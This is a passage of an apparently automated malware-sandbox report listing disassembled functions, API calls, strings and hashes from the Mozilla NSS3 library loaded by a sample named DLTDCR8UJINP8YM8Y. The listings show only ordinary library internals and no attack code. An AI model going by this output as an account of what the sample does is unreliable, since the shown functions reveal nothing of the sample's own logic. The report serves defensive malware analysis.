                                                                                                                                                                                                                          • API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
                                                                                                                                                                                                                          • String ID: config=$library=$name=$nss=$parameters=
                                                                                                                                                                                                                          • API String ID: 391827415-203331871
                                                                                                                                                                                                                          • Opcode ID: 1b27fcad2449a757ccef673a2135b6e669f78c3b9df840e15a4befa3bb81eeab
                                                                                                                                                                                                                          • Instruction ID: 8d755990a2ee1e0775b61e8b42e9058d8f9c7937047295ca205803efd5059ae6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1b27fcad2449a757ccef673a2135b6e669f78c3b9df840e15a4befa3bb81eeab
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 365140F5A01116ABEB01EF249C51EAE37B8DF06249F150024EC59E7741EB25F915C7F2
                                                                                                                                                                                                                          Function 6C4D4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4C50
                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4C5B
                                                                                                                                                                                                                          • PR_smprintf.NSS3(6C5AAAF9,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4C76
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4CAE
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4CC9
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4CF4
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C4D4D0B
                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4D5E
                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C4C4F51,00000000), ref: 6C4D4D68
                                                                                                                                                                                                                          • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C4D4D85
                                                                                                                                                                                                                          • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C4D4DA2
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4D4DB9
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4D4DCF
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                                                          • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                                                          • API String ID: 3756394533-2552752316
                                                                                                                                                                                                                          • Opcode ID: da30a6a26ccb9d27b53399287da330101b6e1e1bc8105615efcd7ce6a8192dee
                                                                                                                                                                                                                          • Instruction ID: d324d214552aceac84dbdb1468c0d23625c44a9b3373f380bc4fca2c22177879
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: da30a6a26ccb9d27b53399287da330101b6e1e1bc8105615efcd7ce6a8192dee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 72418CB1900145ABEB12EF55AC54EBF3675AF82398F1B4128E8164BB01E731F925C7D3
                                                                                                                                                                                                                          Function 6C4B6CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C4B6910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C4B6943
                                                                                                                                                                                                                            • Part of subcall function 6C4B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C4B6957
                                                                                                                                                                                                                            • Part of subcall function 6C4B6910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C4B6972
                                                                                                                                                                                                                            • Part of subcall function 6C4B6910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C4B6983
                                                                                                                                                                                                                            • Part of subcall function 6C4B6910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C4B69AA
                                                                                                                                                                                                                            • Part of subcall function 6C4B6910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C4B69BE
                                                                                                                                                                                                                            • Part of subcall function 6C4B6910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C4B69D2
                                                                                                                                                                                                                            • Part of subcall function 6C4B6910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C4B69DF
                                                                                                                                                                                                                            • Part of subcall function 6C4B6910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C4B6A5B
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4B6D8C
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4B6DC5
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4B6DD6
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4B6DE7
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C4B6E1F
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4B6E4B
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4B6E72
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4B6EA7
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4B6EC4
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4B6ED5
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4B6EE3
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4B6EF4
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4B6F08
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4B6F35
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4B6F44
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4B6F5B
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4B6F65
                                                                                                                                                                                                                            • Part of subcall function 6C4B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C4B781D,00000000,6C4ABE2C,?,6C4B6B1D,?,?,?,?,00000000,00000000,6C4B781D), ref: 6C4B6C40
                                                                                                                                                                                                                            • Part of subcall function 6C4B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C4B781D,?,6C4ABE2C,?), ref: 6C4B6C58
                                                                                                                                                                                                                            • Part of subcall function 6C4B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C4B781D), ref: 6C4B6C6F
                                                                                                                                                                                                                            • Part of subcall function 6C4B6C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C4B6C84
                                                                                                                                                                                                                            • Part of subcall function 6C4B6C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C4B6C96
                                                                                                                                                                                                                            • Part of subcall function 6C4B6C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C4B6CAA
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4B6F90
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C4B6FC5
                                                                                                                                                                                                                          • PK11_GetInternalKeySlot.NSS3 ref: 6C4B6FF4
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                                                          • String ID: +`Ll
                                                                                                                                                                                                                          • API String ID: 1304971872-107483513
                                                                                                                                                                                                                          • Opcode ID: f514ba6a3d124c41400df7bde6c6de4c4d82e7f3e2bd49f5c006ef931e9f0b96
                                                                                                                                                                                                                          • Instruction ID: 24e38675088e43109674bdb20c4d98268a4432938f8196fa35a8d0f60f78433e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f514ba6a3d124c41400df7bde6c6de4c4d82e7f3e2bd49f5c006ef931e9f0b96
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 45B129B1E012199BEF04DBA9DC85FDEBBB8AF0524AF140029E815F7741E731A915CBB1
                                                                                                                                                                                                                          Function 6C461FE0 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 254COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000084,00000001,00000000), ref: 6C462007
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000084), ref: 6C462077
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,0000002C), ref: 6C4620DF
                                                                                                                                                                                                                          • TlsSetValue.KERNEL32(00000000), ref: 6C462188
                                                                                                                                                                                                                          • PR_NewCondVar.NSS3 ref: 6C4621B7
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000084), ref: 6C46221C
                                                                                                                                                                                                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6C4622C2
                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 6C4622CD
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4622DD
                                                                                                                                                                                                                            • Part of subcall function 6C460F00: PR_GetPageSize.NSS3(6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F1B
                                                                                                                                                                                                                            • Part of subcall function 6C460F00: PR_NewLogModule.NSS3(clock,6C460936,FFFFE8AE,?,6C3F16B7,00000000,?,6C460936,00000000,?,6C3F204A), ref: 6C460F25
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: calloc$CondCountCriticalErrorInitializeLastModulePageSectionSizeSpinValuefree
                                                                                                                                                                                                                          • String ID: T ]l$X ]l
                                                                                                                                                                                                                          • API String ID: 3559583721-1146210263
                                                                                                                                                                                                                          • Opcode ID: 702c8ef653eb167796a70106d037ef9ce7752382bdd7065bf7b66a68aeaa0d60
                                                                                                                                                                                                                          • Instruction ID: cb353a9c0766dc503de996c58578f339482c7389c20736abd29f1b82cc6fda99
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 702c8ef653eb167796a70106d037ef9ce7752382bdd7065bf7b66a68aeaa0d60
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 91915AB0A01701AFDB20EF398C09F5B7AF4AB0A705F01442EE55AD6F40DB70A545CF9A
                                                                                                                                                                                                                          Function 6C47DDD0 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 169memorystringtimeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C47DDDE
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000018), ref: 6C47DDF5
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D10F3
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: EnterCriticalSection.KERNEL32(?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D110C
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PL_ArenaAllocate.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1141
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: PR_Unlock.NSS3(?,?,?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D1182
                                                                                                                                                                                                                            • Part of subcall function 6C4D10C0: TlsGetValue.KERNEL32(?,6C478802,00000000,00000008,?,6C46EF74,00000000), ref: 6C4D119C
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(00000000,00000000), ref: 6C47DE34
                                                                                                                                                                                                                          • PR_Now.NSS3 ref: 6C47DE93
                                                                                                                                                                                                                          • CERT_CheckCertValidTimes.NSS3(?,00000000,?,00000000), ref: 6C47DE9D
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C47DEB4
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C47DEC3
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C47DED8
                                                                                                                                                                                                                          • PR_smprintf.NSS3(%s%s,?,?), ref: 6C47DEF0
                                                                                                                                                                                                                          • PR_smprintf.NSS3(6C5AAAF9,(NULL) (Validity Unknown)), ref: 6C47DF04
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C47DF13
                                                                                                                                                                                                                          • PORT_ArenaAlloc_Util.NSS3(?,00000001), ref: 6C47DF22
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,00000000,00000001), ref: 6C47DF33
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C47DF3C
                                                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C47DF4B
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C47DF74
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C47DF8E
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ArenaUtil$Alloc_$strlen$Arena_R_smprintfValuefreememcpy$AllocateCertCheckCriticalEnterFreeInitLockPoolSectionTimesUnlockValidcalloc
                                                                                                                                                                                                                          • String ID: %s%s$(NULL) (Validity Unknown)${???}
                                                                                                                                                                                                                          • API String ID: 1882561532-3437882492
                                                                                                                                                                                                                          • Opcode ID: f903b398dd25a574a3913785b5362bd166a31cd7570a9425ab3511bc87652cc3
                                                                                                                                                                                                                          • Instruction ID: 5d2cab7aa7a231bbd47c5a4810f90e8261fe8cef47e5d1bfcf3dc338b40adf94
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f903b398dd25a574a3913785b5362bd166a31cd7570a9425ab3511bc87652cc3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB51BFB1E012159BDB21DE659C41EAF7AB9EF85359F144029EC09EBB00E731E905CBF2
                                                                                                                                                                                                                          Function 6C4B2D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C4B2DEC
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C4B2E00
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4B2E2B
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4B2E43
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C,?,-00000001,00000000,?), ref: 6C4B2E74
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C484F1C,?,-00000001,00000000), ref: 6C4B2E88
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C4B2EC6
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C4B2EE4
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C4B2EF8
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B2F62
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4B2F86
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6C4B2F9E
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B2FCA
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4B301A
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4B302E
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B3066
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4B3085
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B30EC
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4B310C
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6C4B3124
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4B314C
                                                                                                                                                                                                                            • Part of subcall function 6C499180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C4C379E,?,6C499568,00000000,?,6C4C379E,?,00000001,?), ref: 6C49918D
                                                                                                                                                                                                                            • Part of subcall function 6C499180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C4C379E,?,6C499568,00000000,?,6C4C379E,?,00000001,?), ref: 6C4991A0
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607AD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607CD
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C3F204A), ref: 6C4607D6
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C3F204A), ref: 6C4607E4
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,6C3F204A), ref: 6C460864
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C460880
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsSetValue.KERNEL32(00000000,?,?,6C3F204A), ref: 6C4608CB
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608D7
                                                                                                                                                                                                                            • Part of subcall function 6C4607A0: TlsGetValue.KERNEL32(?,?,6C3F204A), ref: 6C4608FB
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4B316D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3383223490-0
                                                                                                                                                                                                                          • Opcode ID: 5474398e97d62492a9fec835fa086781d88a27c2eaa2c80afe9bc6f1c38a431c
                                                                                                                                                                                                                          • Instruction ID: d64a09e59ee7621d3cac2b732c3709dcc1b3eddb7e37276ce909ca4f765f170a
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5474398e97d62492a9fec835fa086781d88a27c2eaa2c80afe9bc6f1c38a431c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0EF19DB5D006189FEF00DF65DC88F9ABBB4BF09318F054168EC05AB711EB31A995CB91
                                                                                                                                                                                                                          Function 6C499FA0 Relevance: 31.7, APIs: 17, Strings: 1, Instructions: 184COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • CERT_NewCertList.NSS3 ref: 6C499FBE
                                                                                                                                                                                                                            • Part of subcall function 6C472F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C472F0A
                                                                                                                                                                                                                            • Part of subcall function 6C472F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C472F1D
                                                                                                                                                                                                                          • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6C49A015
                                                                                                                                                                                                                            • Part of subcall function 6C4B1940: TlsGetValue.KERNEL32(00000000,00000000,?,00000001,?,6C4B563C,?,?,00000000,00000001,00000002,?,?,?,?,?), ref: 6C4B195C
                                                                                                                                                                                                                            • Part of subcall function 6C4B1940: EnterCriticalSection.KERNEL32(?,?,6C4B563C,?,?,00000000,00000001,00000002,?,?,?,?,?,6C48EAC5,00000001), ref: 6C4B1970
                                                                                                                                                                                                                            • Part of subcall function 6C4B1940: PR_Unlock.NSS3(?,?,00000000,00000001,00000002,?,?,?,?,?,6C48EAC5,00000001,?,6C48CE9B,00000001,6C48EAC5), ref: 6C4B19A0
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C49A067
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C49A055
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: TlsGetValue.KERNEL32(?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4C97
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CB0
                                                                                                                                                                                                                            • Part of subcall function 6C3F4C70: PR_Unlock.NSS3(?,?,?,?,?,6C3F3921,6C5D14E4,6C53CC70), ref: 6C3F4CC9
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C49A07E
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C49A0B1
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C49A0C7
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C49A0CF
                                                                                                                                                                                                                          • PR_CallOnce.NSS3(6C5D2AA4,6C4D12D0), ref: 6C49A12E
                                                                                                                                                                                                                          • PL_FreeArenaPool.NSS3(?), ref: 6C49A140
                                                                                                                                                                                                                          • PL_FinishArenaPool.NSS3(?), ref: 6C49A148
